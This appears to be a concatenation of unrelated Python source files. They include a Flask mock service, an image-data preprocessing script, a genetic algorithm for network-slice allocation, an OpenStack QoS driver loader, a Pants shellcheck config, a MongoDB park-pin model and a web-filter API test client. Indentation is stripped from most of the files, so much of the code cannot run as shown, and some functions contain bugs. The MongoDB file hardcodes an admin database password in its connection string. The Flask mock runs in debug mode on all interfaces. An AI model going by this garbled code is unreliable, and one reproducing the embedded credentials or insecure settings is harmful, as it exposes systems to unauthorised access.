"prixFrappe": "1000.00",
} for _, row in df.iterrows()]
@app.route('/hmsa/api/v1/vehicules/<id_bien>/enlevement', methods=['PUT'])
@process_request
@validate_body(SCHEMA_ENLEVEMENT_VEHICULE)
def enlevement_vehicule(data, id_bien: str):
return ""
@app.route('/bien/<id_correlation_dossier>/update', methods=['GET'])
def update_bien(id_correlation_dossier: str):
new_statut = request.args.get('statut')
if new_statut not in HERMES_STATUT:
most_similar = ", ".join(difflib.get_close_matches(new_statut, HERMES_STATUT))
return f"Le statut n'a pas été reconnu. Les statuts les plus similaires sont : {most_similar}", 422
dataframe = read_dataframe()
row_with_same_id = dataframe['id_correlation'] == f"SIF{id_correlation_dossier}"
match_df = dataframe[row_with_same_id]
if match_df.shape[0] == 0:
return f"Le dossier avec pour id de corrélation {id_correlation_dossier} n'a pas été remis au domaine", 422
now = datetime.now().isoformat()
dataframe.loc[row_with_same_id, ['statut', 'dateMaj']] = new_statut, now
save_dataframe(dataframe)
return f"Le bien avec l'id {id_correlation_dossier} a été mis à jour à {now} avec le statut {new_statut}."
@app.route('/reset', methods=['GET'])
def reset():
dataframe = create_dataframe()
save_dataframe(dataframe)
return "Le bouchon a été réinitialisé"
def read_dataframe() -> pd.DataFrame:
    try:
        return pd.read_csv("static/biens.csv", header=0)
    except FileNotFoundError:
        # fall back to an empty dataframe when the csv does not exist yet
        return create_dataframe()
def save_dataframe(df: pd.DataFrame):
df.to_csv("static/biens.csv", header=True, index=False)
def create_dataframe() -> pd.DataFrame:
return pd.DataFrame(columns=['id_correlation', 'id', 'statut', 'dateMaj'])
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=True)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 14 16:05:33 2018
@author: ck807
"""
import os, glob
import numpy as np
import pandas as pd
import cv2
i = 0
data_file = glob.glob('/local/data/chaitanya/landmarker/images/train/*.png')
files = []
data_file_label = glob.glob('/local/data/chaitanya/landmarker/txt/train/*.txt')
trainData = np.zeros((len(data_file),192, 192, 3))
trainLabel = np.zeros((len(data_file_label), 20))
print('Generating training set..')
for f in (data_file):
a=cv2.imread(f)
trainData[i,:,:,:] = a[:,:,:]
base = os.path.basename("/local/data/chaitanya/landmarker/images/train/" + f)
fileName = os.path.splitext(base)[0]
files.append(fileName)
i += 1
print('Generating training set labels..')
for k in (data_file_label):
base = os.path.basename("/local/data/chaitanya/landmarker/txt/train/" + k)
fileName = os.path.splitext(base)[0]
fileName = fileName + '_depth'
index = files.index(fileName)
txt_file = pd.read_csv(k)
txt_file = txt_file.as_matrix()
txt_file = txt_file.ravel()
trainLabel[index, :] = txt_file[:]
i = 0
data_file_val = glob.glob('/local/data/chaitanya/landmarker/images/val/*.png')
files_val = []
data_file_label_val = glob.glob('/local/data/chaitanya/landmarker/txt/val/*.txt')
valData = np.zeros((len(data_file_val),192, 192, 3))
valLabel = np.zeros((len(data_file_label_val), 20))
print('Generating validation set..')
for f in (data_file_val):
a=cv2.imread(f)
valData[i,:,:,:] = a[:,:,:]
base = os.path.basename("/local/data/chaitanya/landmarker/images/val/" + f)
fileName = os.path.splitext(base)[0]
files_val.append(fileName)
i += 1
print('Generating validation set labels..')
for k in (data_file_label_val):
base = os.path.basename("/local/data/chaitanya/landmarker/txt/val/" + k)
fileName = os.path.splitext(base)[0]
fileName = fileName + '_depth'
index = files_val.index(fileName)
txt_file = pd.read_csv(k)
txt_file = txt_file.as_matrix()
txt_file = txt_file.ravel()
valLabel[index, :] = txt_file[:,]
print('PreProcessing the data..')
trainData = trainData.astype('float32')
trainDataMean = np.mean(trainData)
trainDataStd = np.std(trainData)
trainData -= trainDataMean
trainData /= trainDataStd
trainLabel = trainLabel.astype('float32')
valData = valData.astype('float32')
valData -= trainDataMean
valData /= trainDataStd
valLabel = valLabel.astype('float32')
print('Saving as npy files..')
np.save('trainDataRegressor.npy',trainData)
np.save('trainLabelRegressor.npy', trainLabel)
np.save('valDataRegressor.npy',valData)
np.save('valLabelRegressor.npy', valLabel)
|
xs = []
ys = []
try:
while True:
x, y = map(float, input().split())
xs.append(x)
ys.append(y)
except (EOFError, ValueError):
    # stop reading points at end of input (or on a blank/malformed line)
    pass
ans = []
for i in range (0,len(ys)):
div = 1
for j in range (0,len(xs)):
if i == j:
continue
div = div * (xs[i] - xs[j])
ans.append( ys[i] / div )
for i in range ( 0, len(ans) ):
print('a'+str(i)+':',ans[i])
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
import math
import numpy as np
import random
def check(sr, rbsc, chromosome):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
for i in range(n):
down_bandwidth = 0
up_bandwidth = 0
process = 0
for j in range(m):
down_bandwidth += chromosome[j][i] * sr[j][0]
up_bandwidth += chromosome[j][i] * sr[j][1]
process += chromosome[j][i] * sr[j][2]
        # if any base station is over capacity, the chromosome is infeasible
        if down_bandwidth > rbsc[i][0] or up_bandwidth > rbsc[i][1] or process > rbsc[i][2]:
            return False
    return True
# An individual is thus represented by an M x N array (each row contains exactly one 1, and the resources requested in each column must not exceed the base station's remaining capacity); the whole population is an L x M x N matrix.
def getInitialPopulation(sr, rbsc, populationSize):
m = np.size(sr, 0)
n = np.size(rbsc, 0)
chromosomes_list = []
for i in range(populationSize):
        # randomly generate one chromosome
chromosome = np.zeros((m, n), dtype=int)
rbsc_realtime = np.array(rbsc)
        # fill in one row of the chromosome matrix
        for j in range(m):
            # random probing: try up to ceil(n/2) random assignments
flag = 0
for k in range(math.ceil(n / 2)):
bs_of_select = random.randint(0, n - 1)
if sr[j][0] < rbsc_realtime[bs_of_select][0] and sr[j][1] < rbsc_realtime[bs_of_select][1] and sr[j][
2] < rbsc_realtime[bs_of_select][2]:
chromosome[j][bs_of_select] = 1
rbsc_realtime[bs_of_select][0] -= sr[j][0]
rbsc_realtime[bs_of_select][1] -= sr[j][1]
rbsc_realtime[bs_of_select][2] -= sr[j][2]
flag = 1
break
            # if random probing fails, scan all base stations for one with enough remaining resources
if flag == 0:
for bs_of_select in range(n):
if sr[j][0] < rbsc_realtime[bs_of_select][0] and sr[j][1] < rbsc_realtime[bs_of_select][1] and \
sr[j][2] < rbsc_realtime[bs_of_select][2]:
chromosome[j][bs_of_select] = 1
rbsc_realtime[bs_of_select][0] -= sr[j][0]
rbsc_realtime[bs_of_select][1] -= sr[j][1]
rbsc_realtime[bs_of_select][2] -= sr[j][2]
flag = 1
break
if flag == 0:
continue
        # append the generated chromosome to chromosomes_list
chromosomes_list.append(chromosome)
chromosomes = np.array(chromosomes_list)
return chromosomes
# compute each individual's fitness (bandwidth and computing costs) and its cumulative selection probability
def getFitnessValue(sr, rbsc, chromosomes, delta):
populations, m, n = np.shape(chromosomes)
    # fitness table: one row per chromosome with six entries: down-bandwidth cost, up-bandwidth cost, computing cost, total cost, selection probability, cumulative probability
fitness = np.zeros((populations, 6))
for i in range(populations):
        # take the i-th chromosome
rbsc_realtime = np.array(rbsc)
chromosome = chromosomes[i]
cost_of_down_bandwidth = 0
cost_of_up_bandwidth = 0
cost_of_computing = 0
for j in range(m):
for k in range(n):
if chromosome[j][k] == 1:
cost_of_down_bandwidth += sr[j][0] / (rbsc_realtime[k][0] + delta)
cost_of_up_bandwidth += sr[j][1] / (rbsc_realtime[k][1] + delta)
cost_of_computing += sr[j][2] / (rbsc_realtime[k][2] + delta)
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
fitness[i][0] = cost_of_down_bandwidth
fitness[i][1] = cost_of_up_bandwidth
fitness[i][2] = cost_of_computing
fitness[i][3] = cost_of_down_bandwidth + cost_of_up_bandwidth + cost_of_computing
    # compute the selection probability of each chromosome
sum_of_fitness = 0
if populations > 1:
for i in range(populations):
sum_of_fitness += fitness[i][3]
for i in range(populations):
fitness[i][4] = (sum_of_fitness - fitness[i][3]) / ((populations - 1) * sum_of_fitness)
else:
fitness[0][4] = 1
fitness[:, 5] = np.cumsum(fitness[:, 4])
return fitness
# selection operator
def selectNewPopulation(chromosomes, cum_probability):
populations, m, n = np.shape(chromosomes)
newpopulation = np.zeros((populations, m, n), dtype=int)
    # draw 'populations' random numbers in [0, 1)
randoms = np.random.rand(populations)
for i, randoma in enumerate(randoms):
logical = cum_probability >= randoma
index = np.where(logical == 1)
        # index is a tuple whose elements are ndarrays
newpopulation[i, :, :] = chromosomes[index[0][0], :, :]
return newpopulation
pass
# crossover of the new population
def crossover(sr, rbsc, population, pc=0.8):
"""
:param rbsc:
:param sr:
:param population: 新种群
:param pc: 交叉概率默认是0.8
:return: 交叉后得到的新种群
"""
    # number of individuals taking part in crossover, based on the crossover probability
    populations, m, n = np.shape(population)
    # m, n = population.shape
    numbers = np.uint8(populations * pc)
    # make sure an even number of chromosomes take part in crossover
if numbers % 2 != 0:
numbers += 1
    # new population obtained after crossover
    updatepopulation = np.zeros((populations, m, n), dtype=int)
    # generate random indices of the chromosomes to cross
    index = random.sample(range(populations), numbers)
    # chromosomes not selected for crossover are copied over unchanged
for i in range(populations):
if not index.__contains__(i):
updatepopulation[i, :, :] = population[i, :, :]
# crossover
while len(index) > 0:
a = index.pop()
b = index.pop()
        # randomly probe up to ceil(m/2) crossover points
for i in range(math.ceil(m / 2)):
            # pick a random crossover point
crossoverPoint = random.sample(range(1, m), 1)
crossoverPoint = crossoverPoint[0]
# one-single-point crossover
updatepopulation[a, 0:crossoverPoint, :] = population[a, 0:crossoverPoint, :]
updatepopulation[a, crossoverPoint:, :] = population[b, crossoverPoint:, :]
updatepopulation[b, 0:crossoverPoint, :] = population[b, 0:crossoverPoint, :]
updatepopulation[b, crossoverPoint:, :] = population[a, crossoverPoint:, :]
if check(sr, rbsc, updatepopulation[a]) and check(sr, rbsc, updatepopulation[b]):
break
else:
updatepopulation[a, 0:crossoverPoint, :] = population[a, 0:crossoverPoint, :]
updatepopulation[a, crossoverPoint:, :] = population[b, crossoverPoint:, :]
updatepopulation[b, 0:crossoverPoint, :] = population[b, 0:crossoverPoint, :]
updatepopulation[b, crossoverPoint:, :] = population[a, crossoverPoint:, :]
return updatepopulation
pass
# chromosome mutation
def mutation(sr, rbsc, population, pm=0.01):
"""
:param rbsc:
:param sr:
:param population: 经交叉后得到的种群
:param pm: 变异概率默认是0.01
:return: 经变异操作后的新种群
"""
updatepopulation = np.copy(population)
populations, m, n = np.shape(population)
    # number of genes to mutate
gene_num = np.uint8(populations * m * n * pm)
    # index all genes sequentially (decimal encoding); there are populations * m * n genes in total
    # randomly pick gene_num genes for single-point mutation
mutationGeneIndex = random.sample(range(0, populations * m * n), gene_num)
    # locate each gene to be mutated within its chromosome (i.e. its exact position)
for gene in mutationGeneIndex:
        # which chromosome the gene belongs to
        chromosomeIndex = gene // (m * n)
        # position of the gene within that chromosome
        geneIndex = gene % (m * n)
        # row within the chromosome matrix (the slice request)
        sr_location = geneIndex // n
        # column within the chromosome matrix (the base station)
        bs_location = geneIndex % n
# mutation
chromosome = np.array(population[chromosomeIndex])
if chromosome[sr_location, bs_location] == 0:
for i in range(n):
chromosome[sr_location, i] = 0
chromosome[sr_location, bs_location] = 1
else:
chromosome[sr_location, bs_location] = 0
j = random.randint(0, n - 1)
chromosome[sr_location, j] = 1
if check(sr, rbsc, chromosome):
updatepopulation[chromosomeIndex] = np.copy(chromosome)
return updatepopulation
pass
# update the remaining base-station capacity after applying a solution
def update_rbsc(sr, rbsc, solution):
m, n = np.shape(solution)
rbsc_realtime = np.array(rbsc)
chromosome = solution
for j in range(m):
for k in range(n):
if chromosome[j][k] == 1:
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
return rbsc_realtime
def ga(SR, RBSC, max_iter=500, delta=0.0001, pc=0.8, pm=0.01, populationSize=10):
    # best solution found at each iteration
    optimalSolutions = []
    optimalValues = []
    # build the encoded initial population
chromosomes = getInitialPopulation(SR, RBSC, populationSize)
for iteration in range(max_iter):
        # compute fitness values and cumulative selection probabilities
        fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
        # select the new population
        cum_proba = fitness[:, 5]
        newpopulations = selectNewPopulation(chromosomes, cum_proba)
        # crossover
crossoverpopulation = crossover(SR, RBSC, newpopulations, pc)
# mutation
mutationpopulation = mutation(SR, RBSC, crossoverpopulation, pm)
        # evaluate fitness
        fitness = getFitnessValue(SR, RBSC, mutationpopulation, delta)
        # record the best solution of this iteration and its objective value
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(mutationpopulation[index[0][0], :, :])
chromosomes = mutationpopulation
    # find the overall best solution
optimalValue = np.min(optimalValues)
print("progress\n")
print(optimalValues)
optimalIndex = np.where(optimalValues == optimalValue)
optimalSolution = optimalSolutions[optimalIndex[0][0]]
# iter = range(max_iter)
# plt.plot(iter, optimalValues)
# plt.show()
return optimalSolution, optimalValue
if __name__ == '__main__':
# BSC:base station capacity
# RBSC: residuary base station capacity
# SR: slice request
    # simulate 3 base stations, each with 10 units of down/up bandwidth and 10 units of computing capacity (size N)
    BSC = np.array([[10, 10, 10], [10, 10, 10], [10, 10, 10]], dtype=float)
    # initially the remaining-capacity matrix equals the full base-station capacity
    rbsc = np.array(BSC)
    # simulate a set of slice requests of several types (e.g. bandwidth-heavy, compute-heavy), size M
SR_MODEL = np.array(
[[1 / 16, 5 / 16, 10 / 16], [1 / 16, 10 / 16, 5 / 16], [5 / 16, 1 / 16, 10 / 16], [5 / 16, 10 / 16, 1 / 16],
[10 / 16, 1 / 16, 5 / 16], [10 / 16, 5 / 16, 1 / 16]])
max_iter = 500
delta = 0
pc = 0.8
pm = 0.01
populationSize = 20
    # build 10 rounds of requests
    request_num = 10
    values = np.zeros((request_num), dtype=float)
solutions = []
for iter in range(request_num):
        # randomly choose the number of slices in this request
        m = random.randint(8, 10)
        sr = np.zeros((m, 3), dtype=float)
        # build m slice requests
for i in range(m):
j = random.randint(0, 5)
sr[i] = SR_MODEL[j]
solution, value = ga(sr, rbsc, max_iter, delta, pc, pm, populationSize)
rbsc = update_rbsc(sr, rbsc, solution)
        print('Optimal objective value:', value)
values[iter] = value
print('solution:')
print(solution)
solutions.append(np.copy(solution))
print("总结果")
print(values)
    # ## verification
# m, n = np.shape(solution)
# chromosomes = np.zeros((1, m, n))
# chromosomes[0] = solution
# f1 = sum(solution)
# print("number of support each bs:", f1)
# new_rbsc = update_rbsc(SR, RBSC, solution)
# print("new_rbsc:")
# print(new_rbsc)
# f = getFitnessValue(SR, RBSC, chromosomes, delta)
# print(f)
|
program = [
{'mode': 'sweep', 'start': 8.9, 'stop': 7.6, 'dt': 10, 'nsteps': 1000},
{'mode': 'single', 'freq': 80, 'ampl': 0, 'phase': 0},
# {'mode': 'sweep', 'start': 10.7, 'stop': 8.7, 'dt': 10, 'nsteps': 1000},
# {'mode': 'sweep', 'start': 80, 'stop': 80.1, 'dt': 0.1}
# {'mode': 'single', 'freq': 0, 'ampl': 0, 'phase': 0},
]
profiles = [
{'profile': 0, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 1, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 2, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 3, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 4, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 5, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 6, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 7, 'freq': 0, 'ampl': 0, 'phase': 0},
]
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron.i18n import _LI
from neutron import manager
QOS_DRIVER_NAMESPACE = 'neutron.qos.notification_drivers'
QOS_PLUGIN_OPTS = [
cfg.ListOpt('notification_drivers',
default='message_queue',
help=_('Drivers list to use to send the update notification')),
]
cfg.CONF.register_opts(QOS_PLUGIN_OPTS, "qos")
LOG = logging.getLogger(__name__)
class QosServiceNotificationDriverManager(object):
def __init__(self):
self.notification_drivers = []
self._load_drivers(cfg.CONF.qos.notification_drivers)
def update_policy(self, context, qos_policy):
for driver in self.notification_drivers:
driver.update_policy(context, qos_policy)
def delete_policy(self, context, qos_policy):
for driver in self.notification_drivers:
driver.delete_policy(context, qos_policy)
def create_policy(self, context, qos_policy):
for driver in self.notification_drivers:
driver.create_policy(context, qos_policy)
def _load_drivers(self, notification_drivers):
"""Load all the instances of the configured QoS notification drivers
:param notification_drivers: comma separated string
"""
if not notification_drivers:
raise SystemExit(_('A QoS driver must be specified'))
LOG.debug("Loading QoS notification drivers: %s", notification_drivers)
for notification_driver in notification_drivers:
driver_ins = self._load_driver_instance(notification_driver)
self.notification_drivers.append(driver_ins)
def _load_driver_instance(self, notification_driver):
"""Returns an instance of the configured QoS notification driver
:returns: An instance of Driver for the QoS notification
"""
mgr = manager.NeutronManager
driver = mgr.load_class_for_provider(QOS_DRIVER_NAMESPACE,
notification_driver)
driver_instance = driver()
LOG.info(
_LI("Loading %(name)s (%(description)s) notification driver "
"for QoS plugin"),
{"name": notification_driver,
"description": driver_instance.get_description()})
return driver_instance
|
x = int(input())
halved_x = x >> 1
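# note: x >> 1 floor-divides by 2, e.g. 7 >> 1 == 3 and -7 >> 1 == -4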
print('integer halved is {}'.format(halved_x))
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from typing import Iterable
from pants.core.util_rules.config_files import ConfigFilesRequest
from pants.core.util_rules.external_tool import TemplatedExternalTool
from pants.engine.platform import Platform
from pants.option.option_types import ArgsListOption, BoolOption, SkipOption
from pants.util.strutil import softwrap
class Shellcheck(TemplatedExternalTool):
options_scope = "shellcheck"
name = "Shellcheck"
help = "A linter for shell scripts."
default_version = "v0.8.0"
default_known_versions = [
"v0.8.0|macos_arm64 |e065d4afb2620cc8c1d420a9b3e6243c84ff1a693c1ff0e38f279c8f31e86634|4049756",
"v0.8.0|macos_x86_64|e065d4afb2620cc8c1d420a9b3e6243c84ff1a693c1ff0e38f279c8f31e86634|4049756",
"v0.8.0|linux_arm64 |9f47bbff5624babfa712eb9d64ece14c6c46327122d0c54983f627ae3a30a4ac|2996468",
"v0.8.0|linux_x86_64|ab6ee1b178f014d1b86d1e24da20d1139656c8b0ed34d2867fbb834dad02bf0a|1403852",
]
default_url_template = (
"https://github.com/koalaman/shellcheck/releases/download/{version}/shellcheck-"
"{version}.{platform}.tar.xz"
)
default_url_platform_mapping = {
"macos_arm64": "darwin.x86_64",
"macos_x86_64": "darwin.x86_64",
"linux_arm64": "linux.aarch64",
"linux_x86_64": "linux.x86_64",
}
skip = SkipOption("lint")
args = ArgsListOption(example="-e SC20529")
config_discovery = BoolOption(
default=True,
advanced=True,
help=softwrap(
"""
If true, Pants will include all relevant `.shellcheckrc` and `shellcheckrc` files
during runs. See https://www.mankier.com/1/shellcheck#RC_Files for where these
can be located.
"""
),
)
def generate_exe(self, _: Platform) -> str:
return f"./shellcheck-{self.version}/shellcheck"
def config_request(self, dirs: Iterable[str]) -> ConfigFilesRequest:
# Refer to https://www.mankier.com/1/shellcheck#RC_Files for how config files are
# discovered.
candidates = []
for d in ("", *dirs):
candidates.append(os.path.join(d, ".shellcheckrc"))
candidates.append(os.path.join(d, "shellcheckrc"))
return ConfigFilesRequest(discovery=self.config_discovery, check_existence=candidates)
|
a = [1, 2, 3, 4, 5, 6, 7]
i = 0
while(a[i] <= 5):
print(a[i])
i = i + 1
print("hello")
a = 5
if(a % 2 == 0):
print("even no")
else:
print("odd no")
i = 4
if (i == 1):
print("sparsh")
elif (i == 2):
print("prabal")
elif(i == 3):
print("dhruv")
else:
print("sorry")
|
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense, Flatten, Conv2D
from constants import nb_class
class Classifier(Model):
def __init__(self):
super(Classifier, self).__init__()
self.conv1 = Conv2D(6, kernel_size=(3, 3), strides=(2, 2), activation="relu", padding="same")
self.flat1 = Flatten()
self.dense1 = Dense(32, activation="relu")
self.dense_logits = Dense(nb_class, activation="linear")
def call(self, feature_areas):
output = []
for fa in feature_areas:
x = self.conv1(fa)
x = self.flat1(x)
x = self.dense1(x)
logits = self.dense_logits(x)
output.append(tf.gather(logits, 0))
output = tf.convert_to_tensor(output)
return output
|
import csv
import uuid
import pymongo
import geopy.distance
client = pymongo.MongoClient(
"mongodb+srv://admin:adminadmin@cluster0-dhc2n.mongodb.net/test?retryWrites=true&w=majority")
db_posts = client.test_database.posts
class LocationModel:
@staticmethod
def get_pin(args): # args: _id (pin id)
# returns the park name, lat and long of pin
dummy_pin = args["_id"]
pin = db_posts.find({"_id": dummy_pin}).next()
return pin.get("park"), pin.get("latitude"), pin.get("longitude")
@staticmethod
def get_pins(args):
        # returns the coordinates of user-created landmarks within max_dist km of the user
        # return format: {"pins": [(latitude, longitude), ...]}
name = ""
max_dist = 100 # km
within_max_dist_lst = []
user_coords = (args["latitude"], args["longitude"])
custom_coords = db_posts.find({"park": args["parkId"], "custom": True}) # grabs all user-created landmarks in park
for loc in custom_coords:
loc_coords = (loc.get("latitude"), loc.get("longitude"))
dist = geopy.distance.distance(user_coords, loc_coords).km
if dist < max_dist:
within_max_dist_lst.append(loc_coords)
return {"pins": within_max_dist_lst}
@staticmethod
def get_closest_park(args): # args: latitude, longitude, radius
# gets the closest park in order to determine which pins to get
latitude = args["latitude"]
longitude = args["longitude"]
radius = args["radius"]
parks = []
dists = []
pparks = db_posts.find({"custom": False})
for ppark in pparks:
ppark_coords = (ppark.get("latitude"), ppark.get("longitude"))
dist = geopy.distance.distance((latitude, longitude), ppark_coords)
if dist <= radius:
parks.append(ppark.get("_id"))
dists.append(dist)
if len(parks) == 1:
return parks[0]
elif len(parks) > 1:
return parks[dists.index(min(dists))]
else:
args["radius"] += 50
return LocationModel.get_closest_park(args)
@staticmethod
def populate(): # should only be called once
# populates the db with national parks
with open("nat_parks.csv") as file:
reader = csv.reader(file, delimiter = ",")
for row in reader:
if (row[0] == "Name"):
continue
post = {"_id": row[0],
"latitude": row[1],
"longitude": row[2],
"custom": False,
}
db_posts.insert_one(post)
@staticmethod
def add_pin(args): # args: park, latitude, longitude
# user_id references the "_id" from the User class
# users can add a pin (press + hold) to a national park to increase awareness
# hopefully can add a photo in the future
park = args["park"]
latitude = args["latitude"]
longitude = args["longitude"]
ppark = db_posts.find({"_id": park, "custom": False}).next()
ppark_coords = (ppark.get("latitude"), ppark.get("longitude"))
if geopy.distance.distance(ppark_coords, (latitude, longitude)).km < 550:
post = {"_id": uuid.uuid4(),
"park": park,
"latitude": latitude,
"longitude": longitude,
"custom": True,
}
db_posts.insert_one(post)
else:
raise {"error": "Outside park range.", "code": 401}
|
# -*- coding: utf-8 -*-
import urllib.request
import json
class DataTransferTestCase(object):
def __init__(self, url):
self.url = url
def set_message_push_config_test(self):
url = self.url + 'DataTransferSetMessagePushConfig'
jroot = {}
jroot['msg_code'] = 'valueType=long long'
postData = json.dumps(jroot)
print("test for set_message_push_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_contents_test(self, path):
url = self.url + 'DataTransferSetWebfilterContents' + path
jroot = {}
jarray = list()
contents_0 = {}
contents_0['is_attr'] = 'valueType=bool'
contents_0['path'] = 'valueType=std::string'
contents_0['name'] = 'valueType=std::string'
contents_0['value'] = 'valueType=std::string'
jarray.append(contents_0)
contents_1 = {}
contents_1['is_attr'] = 'valueType=bool'
contents_1['path'] = 'valueType=std::string'
contents_1['name'] = 'valueType=std::string'
contents_1['value'] = 'valueType=std::string'
jarray.append(contents_1)
jroot['contents'] = jarray
postData = json.dumps(jroot)
print("test for set_webfilter_contents")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_message_push_config_test(self):
url = self.url + 'DataTransferGetMessagePushConfig'
print("test for get_message_push_config")
response = urllib.request.urlopen(url)
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_user_pay_function_test(self):
url = self.url + 'DataTransferSetUserPayFunction'
jroot = {}
jroot['user_name'] = 'valueType=std::string'
jroot['token'] = 'valueType=std::string'
jroot['func'] = 'valueType=std::string'
jroot['opcode'] = 'valueType=unsigned int'
postData = json.dumps(jroot)
print("test for set_user_pay_function")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_webfilter_config_test(self, path):
url = self.url + 'DataTransferGetWebfilterConfig' + path
jroot = {}
postData = json.dumps(jroot)
print("test for get_webfilter_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_conf_file_md5_test(self):
url = self.url + 'DataTransferGetConfFileMd5'
jroot = {}
jroot['file_path'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for get_conf_file_md5")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_text_test(self, path):
url = self.url + 'DataTransferSetWebfilterText' + path
jroot = {}
jroot['name'] = 'valueType=std::string'
jroot['value'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for set_webfilter_text")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def notify_web_filter_conf_change_test(self):
url = self.url + 'DataTransferNotifyWebFilterConfChange'
jroot = {}
jroot['name'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for notify_web_filter_conf_change")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def query_user_pay_function_test(self):
url = self.url + 'DataTransferQueryUserPayFunction'
jroot = {}
jroot['user_name'] = 'valueType=std::string'
jroot['token'] = 'valueType=std::string'
jroot['func'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for query_user_pay_function")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_attr_test(self, path):
url = self.url + 'DataTransferSetWebfilterAttr' + path
jroot = {}
jroot['attribute_name'] = 'valueType=std::string'
jroot['attribute_value'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for set_webfilter_attr")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def import_conf_test(self):
url = self.url + 'DataTransferImportConf'
jroot = {}
jroot['rule_path'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for import_conf")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def restore_default_config_test(self):
url = self.url + 'DataTransferRestoreDefaultConfig'
jroot = {}
jroot['file_name'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for restore_default_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def export_conf_test(self):
url = self.url + 'DataTransferExportConf'
jroot = {}
jroot['rule_path'] = 'valueType=std::string'
jroot['optional'] = 'valueType=unsigned int'
postData = json.dumps(jroot)
print("test for export_conf")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def add_webfilter_text_test(self, path):
url = self.url + 'DataTransferAddWebfilterText' + path
jroot = {}
jroot['name'] = 'valueType=std::string'
jroot['value'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for add_webfilter_text")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_webfilter_power_test(self):
url = self.url + 'DataTransferGetWebfilterPower'
jroot = {}
path = list()
path.append('valueType=std::string')
path.append('valueType=std::string')
jroot['path'] = path
postData = json.dumps(jroot)
print("test for get_webfilter_power")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def del_webfilter_config_by_xpath_test(self, path):
url = self.url + 'DataTransferDelWebfilterConfigByXpath' + path
jroot = {}
postData = json.dumps(jroot)
print("test for del_webfilter_config_by_xpath")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def fast_small_data_transfer_write_test(self):
url = self.url + 'DataTransferFastSmallDataTransferWrite'
jroot = {}
jroot['name'] = 'valueType=std::string'
jroot['data'] = 'valueType=unsigned char'
postData = json.dumps(jroot)
print("test for fast_small_data_transfer_write")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_config_test(self, path):
url = self.url + 'DataTransferSetWebfilterConfig' + path
jroot = {}
jroot['op_code'] = 'valueType=unsigned int'
